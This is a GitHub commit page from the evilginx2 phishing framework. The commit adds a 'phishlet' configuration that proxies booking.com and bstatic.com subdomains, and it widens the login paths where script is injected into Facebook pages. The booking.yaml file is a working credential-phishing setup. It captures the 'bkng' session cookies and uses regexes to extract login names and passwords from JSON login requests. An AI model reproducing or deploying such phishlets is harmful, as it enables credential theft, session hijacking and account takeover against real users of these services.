Skip to content

Commit

Permalink
Merge branch 'master' of https://github.com/kgretzky/evilginx2
Browse files Browse the repository at this point in the history
  • Loading branch information
kgretzky committed Sep 21, 2020
2 parents c8e17be + e0485e3 commit 218df95
Show file tree
Hide file tree
Showing 2 changed files with 28 additions and 1 deletion.
27 changes: 27 additions & 0 deletions phishlets/booking.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
author: '@Anonymous'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'accounts.booking' , orig_sub: '' , domain: 'booking.com', session: false, is_landing: true}
- {phish_sub: 'account', orig_sub: 'account', domain: 'booking.com', session: true, is_landing: false}
- {phish_sub: 'secure' , orig_sub: 'secure' , domain: 'booking.com', session: true, is_landing: false}
- {phish_sub: 'www' , orig_sub: '' , domain: 'booking.com', session: true, is_landing: false}
- {phish_sub: 'join' , orig_sub: 'join' , domain: 'booking.com', session: false, is_landing: false}
- {phish_sub: 'admin' , orig_sub: 'admin' , domain: 'booking.com', session: false, is_landing: false}
- {phish_sub: 'q', orig_sub: 'q-cf', domain: 'bstatic.com', session: false, is_landing: false}
- {phish_sub: 'r', orig_sub: 'r-cf', domain: 'bstatic.com', session: false, is_landing: false}
sub_filters: []
auth_tokens:
- domain: '.booking.com'
keys: ['bkng','.*,regexp']
credentials:
username:
key: ''
search: '"login_name":"([^"]*)'
type: 'json'
password:
key: ''
search: '"password":"([^"]*)'
type: 'json'
login:
domain: 'account.booking.com'
path: '/'
2 changes: 1 addition & 1 deletion phishlets/facebook.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -35,7 +35,7 @@ login:

js_inject:
- trigger_domains: ["www.facebook.com"]
trigger_paths: ["/login.php"]
trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"]
trigger_params: []
script: |
function onclickListener(){
Expand Down

0 comments on commit 218df95

Please sign in to comment.